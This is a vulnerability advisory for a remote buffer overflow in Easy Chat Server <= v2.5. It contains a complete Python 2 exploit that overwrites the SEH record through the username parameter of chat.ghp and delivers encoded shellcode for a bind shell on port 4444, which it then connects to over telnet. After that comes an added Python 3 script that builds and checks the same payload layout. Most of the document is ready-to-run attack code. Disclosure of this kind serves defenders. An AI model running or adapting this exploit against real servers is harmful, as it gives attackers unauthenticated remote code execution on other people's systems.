Information
--------------------
Name : EChat Server <= v2.5
Software : E Chat Server
Vendor Homepage : http://www.echatserver.com/
Vulnerability Type : Remote Buffer Overflow Exploit
Severity : High
Researcher : Juan Sacco (Runlvl) <jsacco [at] insecurityresearch [dot] com>
Description
------------------
EChat Server is prone to a remote buffer-overflow vulnerability
because it fails to perform adequate boundary checks on user-supplied
data. An overlong value in the username parameter of chat.ghp,
delivered in a single unauthenticated HTTP GET request, overwrites the
structured exception handler (SEH) record on the stack.
Successfully exploiting this issue allows an attacker to execute
arbitrary code within the context of the affected application. Failed
exploit attempts will result in a denial-of-service condition.
Exploit example as follows
-----------------------------
#!/usr/bin/python
# Easy Chat Server <= v2.5 Remote Buffer Overflow Exploit (SEH overwrite)
# Written by Juan Sacco (Runlvl)
# Contact: [email protected]
# Web site: http://www.insecurityresearch.com
# Target tested: Windows XP SP3
# Note: Python 2 code (print statement, httplib).
import sys
import httplib
import telnetlib


def howtousage():
    print "Sorry, required arguments: Host Port"
    sys.exit(-1)


def run():
    try:
        # Basic structure: JUNK + NSEH + SEH + SHELLCODE
        Junk = '\x41' * 216            # 216 bytes of 'A' to reach the SEH record
        nSEH = '\xEB\x06\x90\x90'      # JMP SHORT +6: skip over the SEH address into the shellcode
        SEH = '\xE1\xB2\x01\x10'       # 0x1001b2e1 pop edi; pop esi; ret (little-endian)
        # Shellcode: bind TCP shell on port 4444, length 751, encoder: Alpha Upper
        ShellCode = (
            "\x89\xe1\xd9\xed\xd9\x71\xf4\x5f\x57\x59\x49\x49\x49\x49\x43"
            "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
            "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
            "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
            "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x39\x43\x30"
            "\x45\x50\x45\x50\x43\x50\x4c\x49\x4b\x55\x50\x31\x4e\x32\x45"
            "\x34\x4c\x4b\x50\x52\x50\x30\x4c\x4b\x56\x32\x54\x4c\x4c\x4b"
            "\x50\x52\x52\x34\x4c\x4b\x54\x32\x47\x58\x54\x4f\x4e\x57\x51"
            "\x5a\x56\x46\x50\x31\x4b\x4f\x50\x31\x4f\x30\x4e\x4c\x47\x4c"
            "\x45\x31\x43\x4c\x43\x32\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54"
            "\x4d\x45\x51\x58\x47\x5a\x42\x4c\x30\x51\x42\x56\x37\x4c\x4b"
            "\x56\x32\x52\x30\x4c\x4b\x50\x42\x47\x4c\x45\x51\x58\x50\x4c"
            "\x4b\x47\x30\x54\x38\x4d\x55\x49\x50\x52\x54\x51\x5a\x45\x51"
            "\x4e\x30\x56\x30\x4c\x4b\x50\x48\x54\x58\x4c\x4b\x56\x38\x51"
            "\x30\x45\x51\x58\x53\x5a\x43\x47\x4c\x51\x59\x4c\x4b\x56\x54"
            "\x4c\x4b\x45\x51\x49\x46\x50\x31\x4b\x4f\x50\x31\x49\x50\x4e"
            "\x4c\x49\x51\x58\x4f\x54\x4d\x45\x51\x58\x47\x56\x58\x4d\x30"
            "\x54\x35\x5a\x54\x54\x43\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x47"
            "\x54\x52\x55\x4d\x32\x50\x58\x4c\x4b\x51\x48\x51\x34\x43\x31"
            "\x4e\x33\x43\x56\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x56\x38\x45"
            "\x4c\x45\x51\x58\x53\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x4e\x30"
            "\x4c\x49\x50\x44\x56\x44\x56\x44\x51\x4b\x51\x4b\x45\x31\x51"
            "\x49\x50\x5a\x50\x51\x4b\x4f\x4d\x30\x56\x38\x51\x4f\x50\x5a"
            "\x4c\x4b\x54\x52\x5a\x4b\x4b\x36\x51\x4d\x52\x48\x56\x53\x47"
            "\x42\x43\x30\x45\x50\x43\x58\x43\x47\x43\x43\x47\x42\x51\x4f"
            "\x56\x34\x52\x48\x50\x4c\x52\x57\x56\x46\x45\x57\x4b\x4f\x4e"
            "\x35\x4e\x58\x5a\x30\x45\x51\x43\x30\x45\x50\x51\x39\x4f\x34"
            "\x51\x44\x56\x30\x52\x48\x51\x39\x4d\x50\x52\x4b\x45\x50\x4b"
            "\x4f\x4e\x35\x56\x30\x56\x30\x50\x50\x50\x50\x47\x30\x50\x50"
            "\x47\x30\x50\x50\x52\x48\x5a\x4a\x54\x4f\x49\x4f\x4d\x30\x4b"
            "\x4f\x49\x45\x4d\x59\x58\x47\x50\x31\x49\x4b\x56\x33\x52\x48"
            "\x43\x32\x43\x30\x54\x51\x51\x4c\x4b\x39\x4d\x36\x43\x5a\x54"
            "\x50\x56\x36\x50\x57\x52\x48\x49\x52\x49\x4b\x56\x57\x43\x57"
            "\x4b\x4f\x58\x55\x50\x53\x56\x37\x52\x48\x4f\x47\x4b\x59\x50"
            "\x38\x4b\x4f\x4b\x4f\x49\x45\x51\x43\x51\x43\x51\x47\x43\x58"
            "\x43\x44\x5a\x4c\x47\x4b\x4b\x51\x4b\x4f\x49\x45\x51\x47\x4c"
            "\x49\x4f\x37\x52\x48\x52\x55\x52\x4e\x50\x4d\x45\x31\x4b\x4f"
            "\x4e\x35\x45\x38\x45\x33\x52\x4d\x45\x34\x45\x50\x4c\x49\x5a"
            "\x43\x51\x47\x51\x47\x51\x47\x50\x31\x5a\x56\x52\x4a\x45\x42"
            "\x51\x49\x56\x36\x4d\x32\x4b\x4d\x45\x36\x4f\x37\x51\x54\x51"
            "\x34\x47\x4c\x43\x31\x43\x31\x4c\x4d\x47\x34\x56\x44\x54\x50"
            "\x49\x56\x45\x50\x51\x54\x51\x44\x50\x50\x50\x56\x56\x36\x56"
            "\x36\x47\x36\x51\x46\x50\x4e\x51\x46\x50\x56\x56\x33\x51\x46"
            "\x43\x58\x52\x59\x58\x4c\x47\x4f\x4c\x46\x4b\x4f\x58\x55\x4c"
            "\x49\x4b\x50\x50\x4e\x51\x46\x47\x36\x4b\x4f\x56\x50\x45\x38"
            "\x54\x48\x4d\x57\x45\x4d\x43\x50\x4b\x4f\x49\x45\x4f\x4b\x4b"
            "\x4e\x54\x4e\x50\x32\x4b\x5a\x52\x48\x4e\x46\x4c\x55\x4f\x4d"
            "\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x54\x46\x43\x4c\x45\x5a\x4b"
            "\x30\x4b\x4b\x4b\x50\x54\x35\x43\x35\x4f\x4b\x47\x37\x45\x43"
            "\x52\x52\x52\x4f\x43\x5a\x45\x50\x51\x43\x4b\x4f\x4e\x35\x41"
            "\x41")
        ShellCodePort = 4444
        CraftedBuffer = Junk + nSEH + SEH + ShellCode
        # The overflow is in the 'username' parameter of chat.ghp; one GET triggers it
        vulnerableURL = ('/chat.ghp?username=' + CraftedBuffer +
                         '&password=null&room=1&null=2')
        Connection = httplib.HTTPConnection(Host, Port)
        Connection.request('GET', vulnerableURL)
        Connection.close()
        print "Connecting to " + Host
        # Connect to the bind shell the payload opened on the target
        TelnetConnection = telnetlib.Telnet(Host, ShellCodePort)
        TelnetConnection.interact()
    except Exception:
        print "Exploit connection closed"


if __name__ == '__main__':
    print "Exploit EChat Server <= v2.5 Remote Buffer Overflow Exploit"
    print "Author: Juan Sacco (Runlvl)"
    try:
        Host = sys.argv[1]
        Port = int(sys.argv[2])
    except (IndexError, ValueError):
        howtousage()
    run()
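As an added example (not part of the advisory and not Juan Sacco's exploit), the Python 3 script below builds the same JUNK + nSEH + SEH + shellcode layout with the offsets parameterised and checks it before anything is sent: that the nSEH short jump lands on the first shellcode byte, that the handler address packs to the same little-endian bytes the exploit uses, and that no byte in the payload would be treated as a delimiter inside a GET query string. The bad-character set is an assumption about a typical HTTP parser, and the shellcode is a constructed placeholder rather than the advisory's 751-byte alpha-upper bind shell; the real payload is alpha-upper encoded precisely so that it survives inside a URL.

```python
"""Build and sanity-check an SEH-overwrite payload destined for an HTTP GET parameter.

Added example, not the advisory's exploit: same layout (JUNK + nSEH + SEH +
shellcode), but every offset is parameterised and verified before use.
"""
import struct

# Layout constants taken from the advisory's exploit.
NSEH_OFFSET = 216                    # filler bytes before the nSEH record
JMP_SHORT_6 = b"\xeb\x06\x90\x90"    # jmp short +6 (over the 4-byte handler address), padded with nops
POP_POP_RET = 0x1001B2E1             # pop edi; pop esi; ret (address used by the advisory)

# Assumption: bytes a typical HTTP server treats as a terminator or delimiter
# inside a query-string value. Each target has its own set; this is illustrative.
QUERY_BAD_CHARS = frozenset(b"\x00\x0a\x0d &=#?")

# Constructed placeholder standing in for real shellcode (uppercase letters only,
# so it is trivially URL-safe); its length is arbitrary.
PLACEHOLDER_SHELLCODE = b"SHELLCODEPLACEHOLDER" * 4


def build_payload(shellcode, nseh_offset=NSEH_OFFSET, nseh=JMP_SHORT_6,
                  seh=POP_POP_RET, filler=b"A"):
    """Return filler + nSEH + SEH + shellcode, with the SEH address packed little-endian."""
    if len(nseh) != 4:
        raise ValueError("nSEH record must be exactly 4 bytes")
    return filler * nseh_offset + nseh + struct.pack("<I", seh) + shellcode


def layout(payload, nseh_offset=NSEH_OFFSET):
    """Describe where each part of the payload lands, to double-check the build."""
    return {
        "nseh": payload[nseh_offset:nseh_offset + 4],
        "seh": struct.unpack("<I", payload[nseh_offset + 4:nseh_offset + 8])[0],
        "shellcode_offset": nseh_offset + 8,
    }


def jmp_short_target(nseh):
    """Decode the 'jmp rel8' at the start of the nSEH record and return the landing
    offset relative to the start of nSEH (8 means 'first shellcode byte')."""
    if nseh[0] != 0xEB:
        raise ValueError("nSEH does not start with a short jmp")
    rel8 = struct.unpack("<b", nseh[1:2])[0]
    return 2 + rel8                  # instruction length plus signed displacement


def find_bad_chars(payload, bad=QUERY_BAD_CHARS):
    """Return (offset, byte) pairs for every payload byte found in the bad set."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def build_request_path(payload, param="username", path="/chat.ghp",
                       tail="&password=null&room=1&null=2"):
    """Assemble the request path the advisory uses, refusing any payload that a
    delimiter byte would split or truncate."""
    bad = find_bad_chars(payload)
    if bad:
        off, b = bad[0]
        raise ValueError("bad char 0x%02x at payload offset %d" % (b, off))
    return path.encode() + b"?" + param.encode() + b"=" + payload + tail.encode()


if __name__ == "__main__":
    p = build_payload(PLACEHOLDER_SHELLCODE)
    info = layout(p)
    print("payload length      :", len(p))
    print("nSEH bytes          :", info["nseh"].hex())
    print("SEH handler address : 0x%08x" % info["seh"])
    print("jmp lands at nSEH+%d (shellcode starts at nSEH+8)" % jmp_short_target(info["nseh"]))
    print("bad chars           :", find_bad_chars(p))
    print("request path length :", len(build_request_path(p)))
```

Run it with no arguments to see the layout report; to check a real payload, pass the target's own bad-character set to find_bad_chars and the real shellcode to build_payload. A one-byte disagreement in the offset or a single delimiter byte in the handler address is what turns a working exploit into the denial-of-service case the description mentions.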
Author
-------------------
Juan Sacco (Runlvl) - http://www.insecurityresearch.com
--
_________________________________________________
Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.6.1 was released, stay tuned